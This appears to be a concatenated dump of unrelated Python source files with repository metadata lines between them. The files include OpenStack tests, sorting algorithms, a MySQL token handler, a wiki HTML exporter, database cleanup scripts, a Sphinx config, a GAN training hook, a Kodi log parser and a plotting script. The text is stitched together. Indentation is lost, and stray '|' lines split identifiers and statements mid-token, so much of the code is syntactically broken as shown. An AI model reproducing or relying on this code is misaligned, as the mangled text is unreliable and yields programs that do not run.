self.assertRaises(exception.BDMNotFound, bdm_object.save)
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id(self, get_by_vol_id):
get_by_vol_id.return_value = self.fake_bdm()
vol_bdm = objects.BlockDeviceMapping.get_by_volume_id(
self.context, 'fake-volume-id')
for attr in block_device_obj.BLOCK_DEVICE_OPTIONAL_ATTRS:
self.assertFalse(vol_bdm.obj_attr_is_set(attr))
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id_not_found(self, get_by_vol_id):
get_by_vol_id.return_value = None
self.assertRaises(exception.VolumeBDMNotFound,
objects.BlockDeviceMapping.get_by_volume_id,
self.context, 'fake-volume-id')
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_instance_uuid_missmatch(self, get_by_vol_id):
fake_bdm_vol = self.fake_bdm(instance={'uuid': 'other-fake-instance'})
get_by_vol_id.return_value = fake_bdm_vol
self.assertRaises(exception.InvalidVolume,
objects.BlockDeviceMapping.get_by_volume_id,
self.context, 'fake-volume-id',
instance_uuid='fake-instance')
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id_with_expected(self, get_by_vol_id):
get_by_vol_id.return_value = self.fake_bdm(
fake_instance.fake_db_instance())
vol_bdm = objects.BlockDeviceMapping.get_by_volume_id(
self.context, 'fake-volume-id', expected_attrs=['instance'])
for attr in block_device_obj.BLOCK_DEVICE_OPTIONAL_ATTRS:
self.assertTrue(vol_bdm.obj_attr_is_set(attr))
get_by_vol_id.assert_called_once_with(self.context, 'fake-volume-id',
['instance'])
def _test_create_mocked(self, cell_type=None, update_or_create=False,
device_name=None):
if cell_type:
self.flags(enable=True, cell_type=cell_type, group='cells')
else:
self.flags(enable=False, group='cells')
values = {'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume',
'instance_uuid': 'fake-instance'}
if device_name:
values['device_name'] = device_name
fake_bdm = fake_block_device.FakeDbBlockDeviceDict(values)
with test.nested(
mock.patch.object(
db, 'block_device_mapping_create', return_value=fake_bdm),
mock.patch.object(
db, 'block_device_mapping_update_or_create',
return_value=fake_bdm),
mock.patch.object(cells_rpcapi.CellsAPI,
'bdm_update_or_create_at_top')
) as (bdm_create_mock, bdm_update_or_create_mock, cells_update_mock):
bdm = objects.BlockDeviceMapping(context=self.context, **values)
if update_or_create:
method = bdm.update_or_create
else:
method = bdm.create
if cell_type == 'api':
self.assertRaises(exception.ObjectActionError,
method)
else:
method()
if update_or_create:
bdm_update_or_create_mock.assert_called_once_with(
self.context, values, legacy=False)
else:
bdm_create_mock.assert_called_once_with(
self.context, values, legacy=False)
if cell_type == 'compute' and 'device_name' in values:
self.assertEqual(1, cells_update_mock.call_count)
self.assertTrue(len(cells_update_mock.call_args[0]) > 1)
self.assertEqual(cells_update_mock.call_args[0][0],
self.context)
self.assertIsInstance(cells_update_mock.call_args[0][1],
block_device_obj.BlockDeviceMapping)
self.assertEqual(cells_update_mock.call_args[1],
{'create': update_or_create or None})
else:
self.assertFalse(cells_update_mock.called)
def test_create_nocells(self):
|
gregpuzzles1/Sandbox
|
Example Programs/Ch_11_Student_Files/Case Study/algorithms.py
|
Python
|
gpl-3.0
| 1,983
| 0.004539
|
"""
File: algorithms.py
Algorithms configured for profiling.
"""
from profiler import Profiler
def selectionSort(lyst, profiler):
i = 0
while i < len(lyst) - 1: # Do n - 1 searches
minIndex = i # for the largest
j = i + 1
while j < len(lyst): # Start a search
profiler.comparison()
if lyst[j] < lyst[minIndex]:
minIndex = j
j += 1
if minIndex != i: # Exchange if needed
swap(lyst, minIndex, i, profiler)
i += 1
def bubbleSort(lyst, profiler):
n = len(lyst)
while n > 1: # Do n - 1 bubbles
i = 1 # Start each bubble
while i < n:
profiler.comparison()
if lyst[i] < lyst[i - 1]: # Exchange if needed
swap(lyst, i, i - 1, profiler)
i += 1
n -= 1
def bubbleSort2(lyst, profiler):
n = len(lyst)
while n > 1:
swapped = False
i = 1
while i < n:
if lyst[i] < lyst[i - 1]: # Exchange if needed
swap(lyst, i, i - 1, profiler)
swapped = True
if trace: print lyst
i += 1
profiler.comparison()
if not swapped: return
n -= 1
def insertionSort(lyst, profiler):
i = 1
while i < len(lyst):
itemToInsert = lyst[i]
j = i - 1
while j >= 0:
|
profiler.comparison()
if itemToInsert < lyst[j]:
lyst[j + 1] = lyst[j]
profiler.exchange()
j -= 1
else:
break
lyst[j + 1] = itemToInsert
profiler.exchange()
|
i += 1
def swap(lyst, i, j, profiler):
"""Exchanges the elements at positions i and j."""
profiler.exchange()
temp = lyst[i]
lyst[i] = lyst[j]
lyst[j] = temp
|
byn9826/Thousand-Day
|
handlers/token.py
|
Python
|
bsd-3-clause
| 1,530
| 0.007843
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mysql.connector
#from token find userId
#return 0 for error
def find
|
User(userToken, cnx):
userQuery = 'SELECT user_id FROM user_token WHERE user_token = %s'
try:
userCursor = cnx.cursor()
userCursor.execute(userQuery, (userToken, ))
return userCursor.fetchone()
#return 0 for db error
except mysql.connector.Error a
|
s err:
print('Something went wrong: {}'.format(err))
return '0'
finally:
userCursor.close()
#create new token
#return 1 for success
#return 0 for error
def addToken(userId, userToken, cnx):
addQuery = 'INSERT INTO user_token (user_id, user_token) VALUES (%s, %s) ON DUPLICATE KEY UPDATE user_token = %s'
try:
addCursor = cnx.cursor()
addCursor.execute(addQuery, (userId, userToken, userToken))
cnx.commit()
return '1'
except mysql.connector.Error as err:
print('Something went wrong: {}'.format(err))
cnx.rollback()
return '0'
finally:
addCursor.close()
#delete token
#return 1 for success
#return 0 for fail
def deleteToken(userId, cnx):
cleanQuery = 'DELETE FROM user_token WHERE user_id = %s'
try:
cleanCursor = cnx.cursor()
cleanCursor.execute(cleanQuery, (userId, ))
cnx.commit()
return '1'
except mysql.connector.Error as err:
cnx.rollback()
print('Something went wrong: {}'.format(err))
return '0'
finally:
cleanCursor.close()
|
unreal666/outwiker
|
plugins/export2html/export2html/branchexporter.py
|
Python
|
gpl-3.0
| 7,572
| 0.008429
|
# -*- coding: UTF-8 -*-
import os.path
import re
from outwiker.core.tree import WikiDocument
from outwiker.utilites.textfile import readTextFile, writeTextFile
from .exporterfactory import ExporterFactory
from .indexgenerator import IndexGenerator
class BranchExporter (object):
def __init__ (self, startpage, nameGenerator, application):
self.__startpage = startpage
self.__application = application
self.__indexfname = u"__index.html"
self.__contentfname = u"__content.html"
# Список ошибок, возникших при экспорте
self.__log = []
self.__nameGenerator = nameGenerator
self.__a_tag_regex = re.compile (
"""
(<\s*a\s+
(.*?)
href\s*=['"](.*?)['"]
(.*?)>)
""",
re.IGNORECASE | re.MULTILINE | re.DOTALL | re.VERBOSE)
# Словарь, который сохраняет, как была названа каждая страница при экспорте
# Ключ - страница, значение - имя ее директории или файла (без расширения) после экспорта
self.__renames = {}
@property
def log (self):
return self.__log
def export (self, outdir, imagesonly, alwaysOverwrite):
self.__log = []
self.__renames = {}
self.__export (self.__startpage,
self.__startpage,
outdir,
imagesonly,
alwaysOverwrite)
self.__replacePageLinks (outdir)
try:
self.__createIndex (outdir, alwaysOverwrite)
except IOError as e:
str (e)
return self.log
def __createIndex (self, outdir, alwaysOverwrite):
"""
Создать оглавление
"""
indexpath = os.path.join (outdir, self.__indexfname)
contentpath = os.path.join (outdir, self.__contentfname)
indexgenerator = IndexGenerator (self.__startpage, self.__renames)
indexgenerator.generatefiles (indexpath, contentpath)
def __replacePageLinks (self, outdir):
"""
Скорректировать ссылки на страницы
"""
for page in list(self.__renames.keys()):
fullname = os.path.join (outdir, self.__renames[page] + u".html")
try:
text = readTextFile(fullname)
newtext = self.__replacePageLinksInText (text, page, outdir)
writeTextFile(fullname, newtext)
except BaseException as error:
self.__log.append (u"{0}: {1}".format (page.title, str(error)))
def __replacePageLinksInText (self, text, page, outdir):
matches = self.__a_tag_regex.findall (text)
hrefMatchIndex = 2
fullMatchIndex = 0
result = text
for match in matches:
url = match[hrefMatchIndex]
if not url:
continue
# Проверить, что это не ссылка на сайт
if self.__isInternetUrl (url):
continue
# Проверить, что это не ссылка на файл
if self.__isFileLink (url, outdir):
continue
linkToPage = None
anchor = None
linkToPage, anchor = self.__getPageByProtocol (url)
# Это ссылка на подстраницу?
if linkToPage is None:
linkToPage = page[url]
if linkToPage is None:
# Это ссылка на страницу из корня?
correcturl = url[1:] if url[0] == "/" else url
linkToPage = page.root[correcturl]
if linkToPage is None:
continue
if linkToPage not in list(self.__renames.keys()):
continue
# Эта страница нам подходит
# Новая ссылка
newhref = self.__renames[linkToPage] + ".html"
if anchor is not None:
newhref += anchor
newFullLink = match[fullMatchIndex].replace (url, newhref)
result = result.replace (match[fullMatchIndex], newFullLink)
return result
def __getPageByProtocol (self, href):
"""
Если href - протокол вида page://..., то возвращает страницу, на которую ведет ссылка (если она существует), в противном случае возвращает None.
"""
# Т.к. поддержка этого протокола появилась только в версии 1.8.0,
# то нужно проверить, есть ли в self.__application член pageUidDepot
if "pageUidDepot" not in self.__application.__dict__:
return (None, None)
protocol = u"page://"
if not href.startswith (protocol):
return (None, None)
# Отсечем протокол
uid = href[len (protocol):]
# Отсечем все, что после
|
/
slashPos = uid.fin
|
d ("/")
uid_clean = uid[: slashPos] if slashPos != -1 else uid
page = self.__application.pageUidDepot[uid_clean]
anchor = self.__getAnchor (uid)
return (page, anchor)
def __getAnchor (self, href):
"""
Попытаться найти якорь, если используется ссылка вида page://...
"""
pos = href.rfind ("/#")
if pos != -1:
return href[pos + 1:]
return None
def __isInternetUrl (self, url):
return (url.startswith ("http://") or
url.startswith ("https://") or
url.startswith ("ftp://") or
url.startswith ("mailto:"))
def __isFileLink (self, url, outdir):
fname = os.path.join (outdir, url)
return os.path.exists (fname) and os.path.isfile (fname)
def __export (self,
page,
root,
outdir,
imagesonly,
alwaysOverwrite):
"""
page - страница, начиная с которой надо начать экспортирование
root - корневая страница, откуда началось общее экспортирование (для определения имени файлов)
outdir - директория для экспорта
imagesonly - из вложений оставлять только картинки?
alwaysOverwrite - перезаписывать существующие файлы?
"""
if page.getTypeString() != WikiDocument.getTypeString():
try:
exporter = ExporterFactory.getExporter (page)
exportname = self.__nameGenerator.getName (page)
self.__renames[page] = exportname
exporter.export (outdir, exportname, imagesonly, alwaysOverwrite)
except BaseException as error:
self.__log.append (u"{0}: {1}".format (page.title, str(error)))
for child in page.children:
self.__export (
child,
root,
outdir,
imagesonly,
alwaysOverwrite)
|
thp44/delphin_6_automation
|
data_process/wp6_v2/not_in_sample.py
|
Python
|
mit
| 3,478
| 0.003163
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
from delphin_6_automation.database_interactions.db_templates import delphin_entry
from delphin_6_automation.database_interactions.db_templates import sample_entry
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_dict
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
def correct_delphin():
samples = sample_entry.Sample.objects().only('delphin_docs')
print(f'There is {samples.count()} samples in DB')
sample_projects = []
for sample in samples:
if len(sample.delphin_docs) == 0:
print(f'Sample {sample.id} has no delphin projects. Deleting!')
sample.delete()
else:
for delphin in sample.delphin_docs:
sample_projects.append(delphin.id)
print(f'There is {len(sample_projects)} connected to a sample')
projects = delphin_entry.Delphin.objects().only('id')
print(f'There are currently {len(projects)} projects in the database')
print('Starting')
for proj in projects:
if proj.id not in sample_projects:
#print(f'Project with ID: {proj.id} is not part of a sample!')
proj.delete()
def correct_sample():
samples = sample_entry.Sample.objects()
for sample in samples:
docs = []
for ref in sample.delphin_docs:
delphin_projects = delphin_entry.Delphin.objects(id=ref.id)
if delphin_projects:
docs.append(delphin_projects.first())
else:
print(f'Found non existent project: {ref.id}')
sample.delphin_docs = docs
sample.save()
def correct_strategy():
strategy = sample_entry.Strategy.objects().first()
keep = []
for sample in strategy.samples:
found_sample = sample_entry.Sample.objects(id=sample.id)
if found_sample:
keep.append(found_sample.first().id)
else:
print(f"Sample {sample.id} was not in the DB")
print(f"Found samples {len(keep)} to keep: {keep}")
strategy.samples = keep
strategy.save()
def modify_sample():
id_ = "5e7878ce582e3e000172996d"
sample = sample_entry.Sample.objects(id=id_).first()
print('Got sample')
sample.mean = {}
sample.standard_deviation = {}
sample.save()
def correct_sample2():
samples = sample_entry.Sample.objects().only('id')
print(f"There is {samples.count()} samples in DB")
for i in range(samples.count()):
samples = sample_entry.Sample.objects(iteration=i).only('id')
print(f'There is {samples.count()} with iteration {i}')
if samples.count() > 1:
print(f"There is {samples.count()} samples with iteration {i}")
for j, sampl
|
e in enumerate(samples):
if j == 0:
pass
else:
print(f'Deleting: {sample.id}')
#sample.delete()
if __name__ == '__main__':
server = mongo_setup.global_init(auth_dict)
#modify_sample()
#correct_sample()
#correct_sample2()
correct_delphin()
correct_strategy()
|
mongo_setup.global_end_ssh(server)
|
a25kk/apm
|
docs/conf.py
|
Python
|
mit
| 5,991
| 0.006343
|
# -*- coding: utf-8 -*-
# Build configuration file.
# This file is execfile()d with the current directory set to its
# containing dir.
# Note that not all possible configuration values are present in this
# autogenerated file.
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
from datetime import datetime
project = u'apm.buildout'
copyright = u'%s, Serge Davidov.' % datetime.now().year
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'buildoutdoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_pape
|
r_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual])
latex_documents = [
('index',
'buildout.tex',
u'apm.buildout Documentation',
u'', 'manual'
|
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
255BITS/HyperGAN
|
hypergan/train_hooks/negative_momentum_train_hook.py
|
Python
|
mit
| 887
| 0.021421
|
import torch
from hypergan.train_hooks.base_train_hook import BaseTrainHook
class NegativeMomentumTrainHook(BaseTrainHook):
def __init__(self, gan=None, config=None, trainer=None):
super().__init__(config=config, gan=gan, trainer=trainer)
self.d_grads = None
self.g_grads = None
def gradients(self, d_grads, g_grads):
if self.d_grads is None:
self.d_grads = [torch.zeros_like(_g) for _g in d_grads]
self.g_grads = [torch.zeros_like(_g) for _g in g_grads]
n
|
ew_d_grads = [g.clone() for g in d_grads]
new_g_grads = [g.clone() for g in g_grads]
d_grads = [_g - self.config.gamma * _g2 for _g, _g2 in zip(d_grads, self.d_grads)]
g_grads = [_g - self.c
|
onfig.gamma * _g2 for _g, _g2 in zip(g_grads, self.g_grads)]
self.d_grads = new_d_grads
self.g_grads = new_g_grads
return [d_grads, g_grads]
|
probonopd/video2smarttv
|
yt2chromecast.py/usr/bin/video2chromecast.py
|
Python
|
mit
| 240
| 0.008333
|
#!/usr/bin/python
import time, sys
if(len(sys.argv) > 0):
video = sys.
|
argv[1]
e
|
lse:
video = "REjj1ruFQww"
try:
import pychromecast
pychromecast.play_youtube_video(video, pychromecast.PyChromecast().host)
except:
pass
|
novoid/Memacs
|
memacs/kodi.py
|
Python
|
gpl-3.0
| 6,858
| 0.00175
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import datetime
import json
import logging
import sys
import time
from itertools import tee, islice, chain
from orgformat import OrgFormat
from memacs.lib.orgproperty import OrgProperties
from memacs.lib.reader import UnicodeDictReader
from .csv import Csv
# stolen from https://stackoverflow.com/questions/1011938/python-previous-and-next-values-inside-a-loop/1012089#1012089
def previous_current_next(some_iterable):
prevs, items, nexts = tee(some_iterable, 3)
prevs = chain([None], prevs)
nexts = chain(islice(nexts, 1, None), [None])
return zip(prevs, items, nexts)
class Kodi(Csv):
def _parser_add_arguments(self):
"""
overwritten method of class Memacs
add additional arguments
"""
super()._parser_add_arguments()
self._parser.add_argument(
'--action-field',
dest="action_field",
required=True,
action='store',
help='field name of the action (start/paused,stopped)',
type=str.lower)
self._parser.add_argument(
'--identification-fields',
dest="identification_fields",
required=True,
action='store',
help='field names to uniquely identify one track e.g. title,artist',
type=str.lower)
self._parser.add_argument(
'--minimal-pause-duration',
dest='minimal_pause_duration',
required=False,
action='store',
default=0,
help=
'minimal duration in seconds of a pause to be logged as a pause instead of being ignored',
type=int,
)
self._parser.add_argument(
'--start-actions',
dest='start_actions',
required=False,
action='store',
default='started,resumed',
help=
'comma seperated action commands when track is started (default started,resumed)'
)
self._parser.add_argument(
'--stop-actions',
dest='stop_actions',
required=False,
action='store',
default='stopped,paused',
help=
'comma seperated action commands when track is stopped/paused (default stopped,paused)'
)
def _parser_parse_args(self):
"""
overwritten method of class Memacs
all additional arguments are parsed in here
"""
super()._parser_parse_args()
self._args.stop_actions = [
name.strip() for name in self._args.stop_actions.split(',')
]
self._args.start_actions = [
name.strip() for name in self._args.start_actions.split(',')
]
if self._args.identification_fields:
self._args.identification_fields = [
name.strip()
for name in self._args.identification_fields.split(',')
]
def read_timestamp(self, row):
if not self._args.timestamp_format:
timestamp = datetime.datetime.fromtimestamp(
int(row[self._args.timestamp_field]))
else:
timestamp = time.strptime(row[self._args.timestamp_field],
self._args.timestamp_format)
return timestamp
def format_timestamp(self, timestamp):
# show time with the timestamp format, but only
# if it contains at least hours and minutes
show_time = not self._args.timestamp_format or \
any(x in self._args.timestamp_format for x in ['%H', '%M'])
timestamp = OrgFormat.date(timestamp,show_time=show_time)
return timestamp
def read_properties(self, row):
properties = OrgProperties(data_for_hashing=json.dumps(row))
output = self._args.output_format.format(**row)
if self._args.properties:
for prop in self._args.properties.split(','):
properties.add(prop.upper().strip(), row[prop])
return properties
def write_one_track(self, row, start_time, stop_time):
properties = self.read_properties(row)
output = self._args.output_format.format(**row)
self._writer.write_org_subitem(
timestamp=self.format_timestamp(start_time) + '--' +
self.format_timestamp(stop_time),
output=output,
properties=properties)
def tracks_are_identical(self, row1, row2):
for field in self._args.identification_fields:
if row1[field] != row2[field]:
return False
return True
def track_is_paused(self, row, next_row):
return next_row and self.tracks_are_identical(row, next_row) and (
self.read_timestamp(next_row) - self.read_timestamp(row)
).total_seconds() < self._args.minimal_pause_duration
def read_log(self, reader):
"""goes through rows and searches for start/stop actions"""
start_time, stop_time = None, None
for prev_row, row, next_row in previous_current_next(reader):
timestamp = self.read_timestamp(row)
action = row[self._args.action_field]
if action in self._args.start_actions:
if not start_time:
start_time = timestamp
elif prev_row and not self.track_is_paused(prev_row, row):
self.write_one_track(prev_row, start_time, timestamp)
start_time = timestamp
elif action in self._args.stop_actions and start_time:
if not self.track_is_paused(row, next_row):
stop_time = timestamp
else:
stop_time = None
if start_time and stop_time:
if self.tracks_are_identical(row, prev_row):
self.write_one_track(row, start_time, stop_time)
start_time, stop_time = None, None
def _main(self):
"""
get's automatically called from Memacs class
"""
with self._args.csvfile as f:
try:
reader = UnicodeDictReader(f, self._args.delimiter,
self._args.encoding,
self._args.fieldnames)
if self._args.skip_header:
next(re
|
ader)
self.read_log(reader)
except TypeError as e:
logging.error("not enough fieldnames or wrong delimiter given")
logging.debug("Error: %s" % e)
sys.exit(1)
except UnicodeDecodeError as e:
logging.error(
"could not decode file in utf-8, please specify input encoding"
|
)
sys.exit(1)
|
fengbeihong/tempest_automate_ironic
|
tempest/api/volume/test_volume_transfers.py
|
Python
|
apache-2.0
| 4,317
| 0
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from testtools import matchers
from tempest.api.volume import base
from tempest import clients
from tempest.common import credentials
from tempest import config
from tempest import test
CONF = config.CONF
class VolumesV2TransfersTest(base.BaseVolumeTest):
@classmethod
def skip_checks(cls):
super(VolumesV2TransfersTest, cls).skip_checks()
if not credentials.is_admin_available():
msg = "Missing Volume Admin API credentials in configuration."
raise cls.skipException(msg)
@classmethod
def setup_credentials(cls):
super(VolumesV2TransfersTest, cls).setup_credentials()
# Add another tenant to test volume-transfer
cls.os_alt = clients.Manager(cls.isolated_creds.get_alt_creds())
# Add admin tenant to cleanup resources
creds = cls.isolated_creds.get_admin_creds()
cls.os_adm = clients.Manager(credentials=creds)
@classmethod
def setup_clients(cls):
super(VolumesV2TransfersTest, cls).setup_clients()
cls.client = cls.volumes_client
cls.alt_client = cls.os_alt.volumes_client
cls.alt_tenant_id = cls.alt_client.tenant_id
cls.adm_client = cls.os_adm.volumes_client
def _delete_volume(self, volume_id):
# Delete the specified volume using admin creds
self.adm_client.delete_volume(volume_id)
self.adm_client.wait_for_resource_deletion(volume_id)
@test.attr(type='gate')
@test.idempotent_id('4d75b645-a478-48b1-97c8-503f64242f1a')
def test_create_get_list_accept_volume_transfer(self):
# Create a volume first
volume = self.create_volume()
self.addCleanup(self._delete_volume, volume['id'])
# Create a volume transfer
transfer = self.client.create_volume_transfer(volume['id'])
transfer_id = transfer['id']
auth_key = transfer['auth_key']
self.client.wait_for_volume_status(volume['id'],
'awaiting-transfer')
# Get a volume transfer
body = self.client.show_volume_transfer(transfer_id)
self.assertEqual(volume['id'], body['volume_id'])
# List volume transfers, the result should be greater than
# or equal to 1
body = self.client.list_volume_transfers()
self.assertThat(len(body), matchers.GreaterThan(0))
# Accept a volume transfer by alt_tenant
body = self.alt_client.accept_volume_transfer(transfer_id,
auth_key)
self.alt_client.wait_for_volume_status(volume['id'], 'available')
@test.idempotent_id('ab526943-b725-4c07-b875-8e8ef87a2c30')
def test_create_list_delete_volume_transfer(self):
# Create a volume first
volume = self.create_volume()
self.addCleanup(self._delete_volume, volume['id'])
# Create a volume transfer
body = self.client.create_volume_transfer(volume['id'])
transfer_id = body['id']
self.client.wait_for_volume_status(volume['id'],
'awaiting-transfer')
# List all volume transfers (looking for the one we created)
body = self.client.list_volume_transfers()
for
|
transfer in body:
if volume['id'] == transfer['volume_id']:
break
else:
self.fail('Transfer not fo
|
und for volume %s' % volume['id'])
# Delete a volume transfer
self.client.delete_volume_transfer(transfer_id)
self.client.wait_for_volume_status(volume['id'], 'available')
class VolumesV1TransfersTest(VolumesV2TransfersTest):
_api_version = 1
|
holli-holzer/python-docx
|
docx/engines/DjangoEngine.py
|
Python
|
mit
| 1,123
| 0.010686
|
import os
import django
from django.conf import settings; settings.configure()
from docx.engines.base import Engine as base
from
|
django.template import Template
from django.template import Template, Context
"""
Engine for Django
"""
class Engine(base):
def __init__(self):
|
self.tag_re = "(\{[^\}]+?\}\}?)"
"""
Fix the template and feed it to the engine
"""
def render(self, template, context):
django.setup()
self._register_filters()
xml = self.fix_tag_gaps(template)
xml = self.fix_block_tags(xml)
self.template = Template(xml)
return self.template.render(Context(context)).encode("utf8")
"""
Load custom template filters from docx/engines/filters/django/*.py
"""
def _register_filters(self):
path = os.path.join(os.path.dirname(__file__), "filters", "django")
for file in os.listdir(path):
if file.endswith(".py") and file != "__init__.py":
module = "filters.django.%s" % file.replace(".py", "")
__import__(module, globals(), locals() )
|
Rob-Rau/EbbCFD
|
ms_refinement/plot_conv.py
|
Python
|
mit
| 2,727
| 0.005501
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
from math import sqrt
from math import log
dx = [1/sqrt(16), 1/sqrt(64), 1/sqrt(256), 1/sqrt(1024)]
dx_tri = [1/sqrt(32), 1/sqrt(128), 1/sqrt(512), 1/sqrt(2048)]
dx_pert = [0.0270466, 0.0134827, 0.00680914, 0.00367054]
dx_fp = [0.122799, 0.081584, 0.0445639, 0.0225922, 0.0113763]
fp_actual = 0.0441995
rl2_euler = [0.00059068, 0.000113051, 2.26156e-05, 5.11884e-06]
rl2_euler_tri = [0.00101603, 0.000277795, 6.37774e-05, 1.4947e-05]
rl2_euler_tri_pert = [0.00053851, 0.000121805, 2.67446e-05, 4.97857e-05]
rl2_euler_tri_limited = [0.00234712, 0.000548344, 0.000139978, 3.56414e-05]
rl2_euler_lp_tri_limited
|
= [0.00242227, 0.000586065, 0.000140727]
rl2_euler_limited = [0.00187271, 0.000435096, 0.000120633, 2.90233e-05]
rl2_euler_lp_limited = [0.00180033, 0.000422567, 0.000120477, 2.90644e-05]
rl2_ns = [0.000576472, 0.000132735, 7.0506e-05, 6.67272e-05]
rl2_ns_fp = [abs(fp_actual - 0.008118), abs(fp_actual - 0.015667), abs(fp_actual - 0.026915), abs(fp_actual - 0.037524), abs(fp_actual - 0.042895)]
print("rho euler
|
l2: "+str(log(rl2_euler[2]/rl2_euler[3])/log(dx[2]/dx[3])))
print("rho euler tri l2: "+str(log(rl2_euler_tri[2]/rl2_euler_tri[3])/log(dx_tri[2]/dx_tri[3])))
print("rho euler tri perturbed l2: "+str(log(rl2_euler_tri_pert[1]/rl2_euler_tri_pert[2])/log(dx_pert[1]/dx_pert[2])))
print("rho euler tri limited l2: "+str(log(rl2_euler_tri_limited[2]/rl2_euler_tri_limited[3])/log(dx_tri[2]/dx_tri[3])))
print("rho euler lp tri limited l2: "+str(log(rl2_euler_lp_tri_limited[1]/rl2_euler_lp_tri_limited[2])/log(dx_tri[1]/dx_tri[2])))
print("rho euler limited l2: "+str(log(rl2_euler_limited[2]/rl2_euler_limited[3])/log(dx[2]/dx[3])))
print("rho euler lp limited l2: "+str(log(rl2_euler_lp_limited[2]/rl2_euler_lp_limited[3])/log(dx[2]/dx[3])))
print("rho ns l2: "+str(log(rl2_ns[0]/rl2_ns[1])/log(dx[0]/dx[1])))
print("rho ns end l2: "+str(log(rl2_ns[2]/rl2_ns[3])/log(dx[2]/dx[3])))
print("rho ns fp l2: "+str(log(rl2_ns_fp[0]/rl2_ns_fp[1])/log(dx_fp[0]/dx_fp[1])))
print("rho ns fp end l2: "+str(log(rl2_ns_fp[3]/rl2_ns_fp[4])/log(dx_fp[3]/dx_fp[4])))
plt.figure()
